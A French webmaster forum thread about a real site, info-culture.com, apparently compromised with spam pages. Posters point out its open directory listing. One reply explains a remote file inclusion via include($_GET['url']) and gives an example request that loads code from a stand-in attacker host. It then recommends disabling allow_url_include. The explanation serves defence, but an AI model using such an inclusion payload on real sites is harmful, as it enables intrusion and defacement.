Comment expliquer à quelqu'un que son site est hacké ?

Discussion dans 'Problèmes de référencement spécifiques à vos sites' créé par maguy11, 25 Février 2020.

  1. maguy11
    maguy11 Nouveau WRInaute
    Inscrit:
    24 Septembre 2010
    Messages:
    9
    J'aime reçus:
    0
    Bonjour,

    Je viens de voir que le site https://www.info-culture.com est hacké.
    Mais pas en direct. Cela ne se voit pas à premier abord.

    En faisant: site:info-culture.com sexe dans google et en allant la page 6, j'ai vu des résultats bizarres ( voir l'image)

    [​IMG]

    A priori il y a eu des créations de pages et des redirections.

    Ce sera difficile d'expliquer car les gens de info-culture.com ne semblent pas être des spécialistes et meconnaisent peut-être les retombés negatives d'un tel acte sur le site.
     
  2. rick38
    rick38 WRInaute passionné
    Inscrit:
    23 Février 2013
    Messages:
    1 444
    J'aime reçus:
    189
    Ben en leur donnant des exemples d'urls de leur site qui affichent des trucs porno, ils devraient réaliser qu'il y a un souci, sinon tant pis pour eux...
     
  3. emualliug
    emualliug WRInaute discret
    Inscrit:
    1 Février 2020
    Messages:
    103
    J'aime reçus:
    19
    Avec en prime la possibilité de lister les fichiers depuis leur serveur apache, et pour au moins un d'entre eux avoir accès au code php…
     
  4. emualliug
    emualliug WRInaute discret
    Inscrit:
    1 Février 2020
    Messages:
    103
    J'aime reçus:
    19
    Question bonus, par quel cheminement t'es venue l'idée d'ajouter "sexe" à une requête "site:" ?
     
  5. rick38
    rick38 WRInaute passionné
    Inscrit:
    23 Février 2013
    Messages:
    1 444
    J'aime reçus:
    189
    Veut-on vraiment le savoir :eek:
     
  6. John13
    John13 WRInaute discret
    Inscrit:
    6 Janvier 2020
    Messages:
    66
    J'aime reçus:
    1
    Lol certains oui visiblement.
     
  7. Li0n.
    Li0n. Nouveau WRInaute
    Inscrit:
    16 Juillet 2019
    Messages:
    37
    J'aime reçus:
    5
    Je pense surtout qu'il a constaté une page bizarre et a tapé ce qu'il lui semblait le plus simple pour faire ressortir ce genre de pages.
    Sinon pas étonnant que le site se soit fait hacké, on peut lister beaucoup, voir tout les répertoires sans problèmes, y compris des répertoires sensibles.
     
  8. maguy11
    maguy11 Nouveau WRInaute
    Inscrit:
    24 Septembre 2010
    Messages:
    9
    J'aime reçus:
    0
    Oui tout a fait Li0n.
    Un mail a été envoyé aux responsables du site via leur formulaire avec comme lien ce"topic"
    Pour qu'ils comprennent qu'il y a un soucis.
     
  9. mickou51
    mickou51 WRInaute discret
    Inscrit:
    8 Janvier 2016
    Messages:
    110
    J'aime reçus:
    9
    /public/authentification.php?url=/public/authentification.php

    ça c'est dangereux de mettre des include($_GET['url']);

    Je suis presque sûr que dans le php.ini il y a ceci sur "on" :

    allow_url_fopen = on
    allow_url_include = on

    Il faut les mettre sur off !!


    allow_url_fopen : tu peux le mettre sur "on" seulement s'il n'existe aucun "fopen($_GET...)
    Idem pour allow_url_include tu peux le mettre sur "on" seulement s'il n'existe aucun include($_GET...) mais pas de bol celui-ci doit être utilisé.

    En résumé un hackeur a suremùent eu l'idée de remplacer ceci :

    /public/authentification.php?url=/public/authentification.php

    par:

    /public/authentification.php?url=http://site_du_hackeur.com/fichier.php avec des caractères spéciaux devant et après l'url et aussi une page fichier.php bien spéciale qui agit comme un fichier en local


    Il faut mettre ça dans php.ini:

    allow_url_include = off
     
  10. Pat00042
    Pat00042 WRInaute occasionnel
    Inscrit:
    16 Mai 2007
    Messages:
    286
    J'aime reçus:
    0
    Pensez-vous qu'inscrire un site de "spectacle pour enfants" est pas bien et qu'il faut "éviter de soumettre à info-culture.com ?
     
Chargement...
Similar Threads - expliquer hacké Forum Date
Comment expliquer une énorme chute du taux de rebond Google Analytics 30 Octobre 2019
Visites en hausse et positionnement en baisse : comment l'expliquer ? Google Analytics 1 Juin 2018
quelqun pour m'expliquer la mise en place de serveurs pour email Gmail, Google Talk, Blogger et Orkut 25 Septembre 2017
Qui peut m'expliquer un peu ce code qui... fonctionne bien Développement d'un site Web ou d'une appli mobile 16 Mars 2017
Comment expliquer qu'un site sans backlink soit numéro 1 ? Référencement Google 9 Juillet 2016
Comment expliquer qu'il y a plus de clics convertis (conversions) que de clics? AdWords 5 Février 2016
Comment expliquer des fluctuations dans le positionnement Google ? Problèmes de référencement spécifiques à vos sites 11 Juin 2015
Comment expliquer un fort pourcentage de trafic direct dans Google analytics Google Analytics 10 Avril 2015
QUI PEUT M'EXPLIQUER CELA? Problèmes de référencement spécifiques à vos sites 20 Décembre 2014
Comment expliquer une chute du nombre de visites sans pertes de positions ? Référencement Google 13 Octobre 2013
  1. Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies.
    Rejeter la notice